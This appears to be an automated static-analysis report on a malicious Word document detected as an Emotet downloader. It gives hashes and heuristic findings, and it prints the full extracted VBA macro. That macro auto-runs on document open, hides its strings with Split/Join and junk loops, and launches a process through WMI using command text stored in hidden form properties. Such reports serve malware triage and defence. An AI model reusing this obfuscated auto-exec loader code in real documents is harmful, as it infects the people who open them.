Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04dfb2f392ec304d…

MALICIOUS

Office (OLE)

196.6 KB Created: 2019-12-18 09:56:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: e3403bea8d97d865ccb1542b9384a082 SHA-1: 60f6534e9b05bcc2b70bd43d9ca1b516d64fcf9b SHA-256: 04dfb2f392ec304df0fe8ff84c4e9e1c4b6cab4f0b9ab8146de6e1cbdf744b3d
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7464291-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464291-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Foddsppkuff = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Yawhyqzkpr.Urwdatalesy + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Fcvvzzjpbdd = VBA.CreateObject(JJKBSKJ + Foddsppkuff)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10687 bytes
SHA-256: 4601893e6e8a820cb8f58f9f8e203c2bdfa442eb4d8d8015359fb0a473af67fe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
344 of 513 identifiers look randomly generated (e.g. 'W32ksad_weddvin32ksad_weddv332ksad_weddv') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Yawhyqzkpr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Urwdatalesy, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Indahpwr
         Case Wazzowebwz
   Kkqqrbwgmbr = Sin(Dgdrjluzi)
   Txwalsaxdvdsk = CStr(Uuowujbslpbkn)
   Nbbtwufv = 324
   Btulzoszlrzk = Sin(Oseklkimkzh)
   Rvdoztdtpgg = CStr(Ikbwedpn)
   Pvkklojv = 567
   Xbeicarivylyy = Sin(Xlnveldm)
   Tpiseglcndh = CStr(Uelhsgsrwain)
   Azmtpnuilipqs = 5645
End Select
For Lgurrtrselfy = Ozfbkldakrtzm To Rbosvlto
      While Cigiikoykw <> Oioskvdyrh
         Njqgamuliph = Scgebbwvgngdd * Atn(Lyuvkrvythxyb) * (Zamvstwt + Bugwkdxlw)
      Wend
Next
   Select Case Bmuerlim
         Case Nsmjooecln
   Pxnqysefwajf = Sin(Gabqgepawykh)
   Bhfzmgxwqbmqh = CStr(Mjgdtieaugl)
   Bpgruedovks = 324
   Jjaepwjkkodee = Sin(Gksbbivbvvwdd)
   Znevyuzqrpv = CStr(Acnpnfilrrx)
   Hfittfjtpqz = 567
   Dgublgdebsig = Sin(Tfhvhfknuhxwp)
   Lmngvcbqqgqlj = CStr(Amehqohusd)
   Mndpqihqgua = 5645
End Select
For Roqpquahhgkri = Drvcnmodnq To Cpgfmkly
      While Ecihiegsxhd <> Ozygjdldzp
         Rbbyhxhjnnttf = Xusszdcrgn * Atn(Vomfmrjq) * (Uqkwpzbge + Tnjgwrupk)
      Wend
Next
   Select Case Etublhozpil
         Case Ackizvgy
   Ouuniwutbytp = Sin(Praxorhdfts)
   Rhcwrqafgr = CStr(Cvokpglzu)
   Vijwlkobv = 324
   Cmybcycjiz = Sin(Mwttpmgcrxz)
   Iupurpyzssc = CStr(Enwlliorwar)
   Operfmrotdmpq = 567
   Rtdqicitfg = Sin(Tvmuxdsaiua)
   Uzljkvuyfac = CStr(Ixgwzltw)
   Hjolxjzwtpbn = 5645
End Select
For Jvlrsnvjxxuvu = Putwhdzvjxofd To Zvujmeabd
      While Ymrrbonadviqv <> Zbudhszqxz
         Arpspmkfne = Ascglrezpcey * Atn(Cezwtsad) * (Ocsekowuiy + Psegvbvxnqk)
      Wend
Next
Dximwvhfjrbe
End Sub

Attribute VB_Name = "Dsncauqo"
Attribute VB_Base = "0{1B0B6CC2-8098-490A-9B4F-493863E97EAE}{4707F63C-022C-4F70-A3CB-BDF0B2D8AA0F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Xvcradjnifpb"
Function Jwqcmzlkvm()
   Select Case Fblpyswqjxmhf
         Case Htuwgekqb
   Dtwduyucrbk = Sin(Gxamhzlwmby)
   Wzsvlkpjo = CStr(Gcondvewudqi)
   Icnsqsxhmbujw = 324
   Jhruggelytrwb = Sin(Frpxcibrx)
   Yqmstyoxlwznw = CStr(Qpyyvwgh)
   Uznriptj = 567
   Oygzthepi = Sin(Sgyrlsyp)
   Irozzbfdgfem = CStr(Sjyfnsrzoab)
   Zwxutkqfhra = 5645
End Select
For Ymbayfxiz = Tbgajcoxgnfg To Kbsklrymhu
      While Nbvvfatdbrdpv <> Dmtsfspn
         Ynlvgumvm = Blhenfjsxc * Atn(Ovzobzeyn) * (Hmiiuxrujpq + Lnrmfvgc)
      Wend
Next
Hgxjqndjtodcc = Yawhyqzkpr.Urwdatalesy
   Select Case Rvdctltuqlb
         Case Illbmsxljt
   Vzkzxueoofs = Sin(Mmogvhowrsys)
   Jveibeoymjvs = CStr(Qycsygafjeomj)
   Glghcusk = 324
   Igoaflcqrgt = Sin(Ujsemztpu)
   Gxolocynecqa = CStr(Etlvsljqf)
   Kqfldbnjtuhwr = 567
   Hfleejgyifi = Sin(Llpscmem)
   Aacqslxx = CStr(Dddebhpdrxfv)
   Xieotexbpc = 5645
End Select
For Csnnlina = Hlrvxavuxe To Tkgidpvbnaty
      While Qdmxigloatwyh <> Ufgjkzdgc
         Eyvgstpakriaw = Ejnlehyus * Atn(Ouxmxjrjcn) * (Bdihmpmfjwev + Qaqfdckfeucx)
      Wend
Next
Fxkmvaokgetd = Hgxjqndjtodcc + Dsncauqo.Pcxficdafxv + Dsncauqo.Zapwmbwj + Dsncauqo.Nbkxiaaqsmx
   Select Case Mvotmjfk
         Case Fcyerzqzxv
   Ebvgahrtuf = Sin(Vyqwwypmgj)
   Hzaoglog = CStr(Qnxgixtk)
   Knititcy = 324
   Fumsyahcmj = Sin(Euhdzqprtw)
   Turhfnjpzuu = CStr(Fihqqxfj)
   Nmftmjprja = 567
   Djzwzzamjalcu = Sin(Bcypeuldv)
   Wgkclvcfexqt = CStr(Jmznadzea)
   Lktesgewfdt = 5645
End Select
For Opzodkkiz = Imquwtsgwnzl To Mrmxscqk
      While Ldlbqdglaywgq <> Llngtpeqnqsxl
         Eyurjtiqq = Okkegbcxh * Atn(Eyjhnykx) * (Estylyagduxn + Tgikrvoz)
      Wend
Next
Igeewuglwd = Fxkmvaokgetd + Dsncauqo.Uvqcrlowzsqr + Dsncauqo.Tbzyyocsxk.Factoid
   Select Case Srijgvbhrj
         Case Gsysljqdmbohm
   Ovgchixukyvk = Sin(Wuvokciqugcai)
   Cbwwzmllgtr = CStr(Ouqzmdqhtsbim)
   Azhzbdiw = 324
   Emkjousukbz = Sin(Nfgjjivo)
   Jkhmshugxrk = CStr(Fxfxincwckv)
   Uuyndaryaygi = 567
   Qvbyseoamd = Sin(Akrhalryma)
   Nkqreyyoib = CStr(Aldpeuiv)
   Zghtyvrbapo = 5645
End Select
For Hnxwnfweyy = Pibtssmhw To Kladxgbwmj
      While Chxuqfnbiqmj <> Ihxckowdmkn
         Xxcexpmzluxvb = Buzqphytyk * Atn(Yyvnhngpdf) * (Taqwnzgifnc + Wmrzedtydo)
      Wend
Next
Jwqcmzlkvm = Bivsjsdm + Igeewuglwd + Bivsjsdm
   Select Case Akforzxcjsik
         Case Drigxnti
   Ybyokfcypufv = Sin(Mivojovrezm)
   Ohbarsnppajs = CStr(Kvxvhqrtpse)
   Whxzcwln = 324
   Uodnbwhmwgy = Sin(Gdexcvrjvsnri)
   Gwrdthdh = CStr(Pwhfisgk)
   Vxyirzdywpw = 567
   Gfapusndw = Sin(Nykdnzhgwbfj)
   Lueelpgwr = CStr(Idlsxnzx)
   Toalwhqwdbwdg = 5645
End Select
For Jylknqgjdevwo = Glsmrfesoiq To Aefwbunonnr
      While Fwgakbxquk <> Rsfgxcxpsiyz
         Tkysybhezhmn = Cxftucjciiq * Atn(Puwygbpimrcm) * (Msyujejnude + Lrcqbmhrkdjfl)
      Wend
Next
End Function
Function Dximwvhfjrbe()
   Select Case Tggrfzlsq
         Case Iypnmvnzclun
   Rtxgrhohvnbnc = Sin(Oqvvmdtgtmsu)
   Uzswsognlyed = CStr(Blyszfov)
   Xvxnetznwlbn = 324
   Kanaexqjcqeh = Sin(Vmgzbayw)
   Irzqgpcnchiy = CStr(Qbbnthixfys)
   Bmitnkvrm = 567
   Dnorehswusjay = Sin(Ijlmayvk)
   Tnuowwdd = CStr(Fsrsygwpls)
   Ijblgaxbhc = 5645
End Select
For Ktxiywfwxax = Sntcfyiojfkm To Dfzddfbhfin
      While Mqnilltnndz <> Fbbnnvog
         Xxukqkhlooj = Wxyarcqcaazza * Atn(Vrdjkzpkradc) * (Lnujdfpouwdm + Wvlqeppwlalzg)
      Wend
Next
MNDUE = "32ksad_weddv"
Foddsppkuff = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Yawhyqzkpr.Urwdatalesy + "rocess"
   Select Case Etpxzjpkewjh
         Case Xjyfcaamj
   Triesfqhg = Sin(Jmkidsvdsqz)
   Ahzrtvrksq = CStr(Gfmqszvsjzlv)
   Hrfdqtdzekfyo = 324
   Cqveqwninarew = Sin(Veywnafp)
   Ohbblukjtg = CStr(Rdaujsdzpha)
   Basxyxbvrcp = 567
   Bggucrrgn = Sin(Trmlawggxnkt)
   Vjgtzblicq = CStr(Ufjlinfxegkq)
   Viotrmojgikm = 5645
End Select
For Jlownhcbxlew = Hoyqyefctjyl To Yaavzmntso
      While Sulcovyucsk <> Johreycdrcw
         Wbgnvknjll = Vcmjigqghpx * Atn(Nqblbror) * (Xoowzheycqajv + Ivgebhdzmitm)
      Wend
Next
Set Fcvvzzjpbdd = VBA.CreateObject(JJKBSKJ + Foddsppkuff)
   Select Case Kfrkhuyw
         Case Mjeerxofccnw
   Uupnolagfl = Sin(Amdixgyh)
   Zhcfwndd = CStr(Yhpmflhaugd)
   Pxbcuegyzvuv = 324
   Ipndcyxdsw = Sin(Mzymiwho)
   Uljyhpymv = CStr(Zylgcbuvmfflr)
   Znnxotzau = 567
   Dqhegbzemamf = Sin(Mszdpzrgaply)
   Eayreixd = CStr(Ydlnegnhh)
   Azweccxq = 5645
End Select
For Hdxambvbwxje = Loebtcerv To Bbmcfamw
      While Anmsesfleswh <> Nyvxppqiwwka
         Rxwidmlariojy = Ihtjtogeohz * Atn(Rpiejgtgvoeg) * (Hmjfqkrnpr + Kkshbekujba)
      Wend
Next
Itjufdscnigtg = Foddsppkuff + Dsncauqo.Gyeuzeheo.ControlTipText + Dsncauqo.Syytzdaga.ControlTipText
   Select Case Pzrmynln
         Case Tzebezbu
   Qlgdkqtw = Sin(Zbzwuwnkdi)
   Lfgzpfbwizgd = CStr(Tobiupkr)
   Zhhhmqqdnxzb = 324
   Anugdzuviq = Sin(Ivoxiubozhytk)
   Dqqdsrqig = CStr(Odxezqfn)
   Pqpfzimspawlr = 567
   Rnkhsmhce = Sin(Rviiowjmoabxt)
   Prugdlgyh = CStr(Fqihnkaaqqjh)
   Bfcfqprx = 5645
End Select
For Qiybmlwbftqtd = Rxssngjigc To Trndicmq
      While Znfuicsjhc <> Ysyfaqgzrygh
         Rqirrqgfxe = Yhpxvehasuec * Atn(Kfuagxqxkbap) * (Mtutsgszk + Cadswlgp)
      Wend
Next
Wkzbcvhhana = Itjufdscnigtg + Yawhyqzkpr.Urwdatalesy
   Select Case Zuzymqpy
         Case Ehywblpxtxuq
   Nctkpcimegaas = Sin(Sieajxtrgo)
   Npcjjpdk = CStr(Ejdlsdrvasyna)
   Quytkmwtavw = 324
   Rkpfzvdvxxfqa = Sin(Ddzomusveqy)
   Pdqvaudqc = CStr(Flttwtdkbip)
   Ipcypkoblvfuh = 567
   Fhxbkljaazy = Sin(Niazgunlseb)
   Mtqnzpjn = CStr(Lolkyoczqzbo)
   Fnnwendvjgzp = 5645
End Select
For Ajcahpoluj = Pflscxrvilbni To Peelieqygxa
      While Gusdhixxkr <> Yoeohoso
         Hqyfrzgeucqep = Yfavsfmakkqm * Atn(Iirnhmcfbqyqg) * (Kuzqvjir + Tupnvbmwe)
      Wend
Next
Set Dximwvhfjrbe = CreateObject(Wkzbcvhhana)
   Select Case Eaeulmygksyh
         Case Fnmvwaczrkk
   Qtzhyvjwxpq = Sin(Gieubyjiqu)
   Xmseiujmw = CStr(Klzlqthyvx)
   Tvximphzzlab = 324
   Rpvglnywtjcn = Sin(Iwsjltyjllx)
   Inzlxcybscp = CStr(Vxbogyvsrcsqq)
   Idjioyqiuxek = 567
   Ptdxmybiwfz = Sin(Qkhuhnftotgxz)
   Hqboafbjotd = CStr(Agejnbzymdw)
   Taawantnagd = 5645
End Select
For Rpbsaewo = Oxjxgpume To Mairtqydza
      While Nkjwudsaaztlz <> Mxgtytofosa
         Yluhoywnwta = Rkmhwscalf * Atn(Bfyfudtwe) * (Elxbucqefkm + Shviennf)
      Wend
Next
Dximwvhfjrbe.XSize = False
   Select Case Mcbltwcvepi
         Case Tazhdblmugbi
   Jmszdkbqrn = Sin(Ypfiobyq)
   Gekxacrw = CStr(Jnsimqee)
   Jmlbdwhl = 324
   Ksqfgnpfkyyun = Sin(Lxwwyxtbquts)
   Dvfezrqxmbya = CStr(Rdozshszkpuc)
   Zknufkgcsqnb = 567
   Kuxxxzjngta = Sin(Elqjxazx)
   Dvonokxmqfe = CStr(Sxerhletuei)
   Cgqacqigtbjl = 5645
End Select
For Ihkvypvy = Jrmxujrgkwhq To Cngjyvvgmiv
      While Ijnweuxrld <> Jkdayvrmut
         Lzrxdfeci = Wxadwxyrkv * Atn(Krfnmdapoyf) * (Daofzidkb + Xsvowbam)
      Wend
Next
Dximwvhfjrbe.YSize = False
   Select Case Iahufyhsema
         Case Mltyiajlooeo
   Owscuuetwib = Sin(Rhptwdxlq)
   Wcrftmcg = CStr(Tvlkfeqsp)
   Wsrdzvikwfxnr = 324
   Czajgvabymdi = Sin(Htayfzjabtruv)
   Whtenbqs = CStr(Bwqtrvmrl)
   Wpmficxgrm = 567
   Zcejecxqau = Sin(Dtgkxfcj)
   Zrhzfztlosa = CStr(Rnliooylbwhc)
   Nimjqljcmcfxy = 5645
End Select
For Gbdrbpxmxou = Xvzwqdfc To Jzhoajdrqb
      While Vekngqwovvlf <> Cigurmeststa
         Uwezhbav = Wpgnnooc * Atn(Hukvkkrdls) * (Tuuyrlxdr + Dybfqefdrrouz)
      Wend
Next
Do While Fcvvzzjpbdd.Create(UJNDB & Jwqcmzlkvm, Icyyuiydh, Dximwvhfjrbe, Mlbxpkiourbgp)
Loop
   Select Case Xoqciftiwq
         Case Wszphmizmu
   Azqgsycjfn = Sin(Pyjgetrpxaa)
   Vgqbdxcthcjp = CStr(Ynwejljajdb)
   Celzyflxrlic = 324
   Vivaqrdtc = Sin(Rylvxnzhfzpvc)
   Bsgcocthos = CStr(Leojckdg)
   Buyiukfgmtphq = 567
   Altyrxcjjod = Sin(Mlzdcbqmdgi)
   Hguodndv = CStr(Jipczlotquotb)
   Eouawflppq = 5645
End Select
For Vlqmukmpvnz = Omronnea To Yiuftxtzlcwti
      While Ujoeqrpca <> Taccrosmrdze
         Cnnpevdrgtdp = Hjfuyaesxj * Atn(Awieufvnn) * (Nvlpcuiz + Gehxegsnkpef)
      Wend
Next
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.